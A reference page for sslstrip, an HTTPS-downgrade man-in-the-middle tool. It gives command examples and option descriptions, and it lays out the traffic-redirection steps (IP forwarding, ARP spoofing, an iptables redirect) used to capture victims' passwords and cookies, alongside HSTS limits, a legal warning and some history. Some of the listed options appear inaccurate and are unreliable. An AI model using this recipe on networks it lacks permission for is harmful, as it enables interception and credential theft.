sslstrip

Log only HTTPS POST traffic on port 10000 by default

$ sslstrip

$ sslstrip --listen=[8080]

$ sslstrip --ssl --listen=[8080]

$ sslstrip --listen=[8080] --all

$ sslstrip --listen=[8080] --write=[path/to/file]

$ sslstrip --help

sslstrip [options]
Common usage requires redirection of network traffic, often via iptables rules and ARP spoofing.
Example: sslstrip -l 8080 -w stripped_data.log

-l, --listen
    Specifies the listening port for sslstrip. This is the port where redirected HTTP traffic from the victim will arrive.

-w, --writefile
    Writes all stripped (decrypted) data and session information to the specified log file for later analysis.

-k, --kill
    Kills connections that encounter SSL errors. This can help prevent the victim's browser from showing SSL certificate warnings, making the attack more stealthy.

-s, --ssl_only
    Instructs sslstrip to only strip SSL/TLS content, ignoring plain HTTP traffic. This can be useful if you only want to focus on encrypted connections.

-f, --logfile
    Specifies a file to log general activity and errors of sslstrip, separate from the stripped data.

-p, --proxy
    Enables proxy mode, where sslstrip acts as a traditional HTTP proxy. Useful when configuring browsers or applications to explicitly use it as a proxy.

-a, --audit
    Runs in audit mode. sslstrip will identify and log potential HTTPS targets but will not perform the stripping attack, allowing for reconnaissance.

-u, --host
    Strips SSL only for connections to the specified host or domain.

-v, --version
    Displays the version information of sslstrip.

-h, --help
    Shows the help message and available options for the command.

sslstrip is a powerful tool designed to perform a Man-in-the-Middle (MITM) attack, specifically targeting HTTPS (HTTP Secure) connections. Developed by Moxie Marlinspike, it works by transparently converting HTTPS traffic into HTTP, effectively stripping away the SSL/TLS encryption layer between the victim and the attacker. When a user attempts to access an HTTPS website, sslstrip intercepts the request and proxies it to the actual HTTPS server. However, it rewrites all HTTPS links on the webpage to HTTP links before forwarding the content to the victim's browser. This allows the attacker to view, capture, or even modify all sensitive information (like usernames, passwords, and cookies) that would normally be protected by encryption, without the victim realizing their connection is no longer secure. It relies on other tools like ARP spoofing (`arpspoof`) and `iptables` rules to redirect the victim's traffic through the attacker's machine.

Despite its historical effectiveness, sslstrip faces significant limitations against modern web browsers and server configurations due to the widespread adoption of HSTS (HTTP Strict Transport Security).

HSTS Bypass: HSTS forces browsers to only connect to a website using HTTPS, even if the user types HTTP or clicks an HTTP link. Once a browser has visited an HSTS-enabled site over HTTPS, it will remember this preference for a specified duration, making sslstrip ineffective for subsequent visits.

Browser Warnings: If a browser encounters an SSL error (e.g., due to sslstrip attempting to establish an untrusted SSL connection on behalf of the user), it will typically display prominent security warnings that alert the user to a potential attack.

Legal Implications: Using sslstrip without explicit permission on networks you do not own or control is illegal and unethical, potentially leading to severe legal consequences.

For sslstrip to function, network traffic must be redirected through the attacker's machine. This typically involves:
1. Enabling IP Forwarding: Setting `net.ipv4.ip_forward = 1` in `/etc/sysctl.conf` and applying with `sysctl -p` to allow the attacker's machine to route packets.
2. ARP Spoofing: Using tools like `arpspoof` or `ettercap` to trick the victim and the gateway into sending their traffic to the attacker's MAC address.
3. IPTables Rules: Configuring `iptables` to redirect incoming HTTP traffic (typically on port 80) to sslstrip's listening port (e.g., `iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port `). This ensures all web traffic intended for port 80 is shunted to sslstrip for processing.

sslstrip was publicly released by Moxie Marlinspike at the Black Hat DC conference in 2009. At the time, it demonstrated a groundbreaking and alarming vulnerability in the perceived security of HTTPS connections. Its introduction spurred the development and widespread adoption of countermeasures like HTTP Strict Transport Security (HSTS) and HPKP (HTTP Public Key Pinning, now deprecated), significantly enhancing browser security against such downgrade attacks. While its direct effectiveness against modern browsers is limited, it remains an important historical tool for understanding web security vulnerabilities and the evolution of HTTPS protection.

arpspoof(8), ettercap(8), dsniff(8), mitmf(1)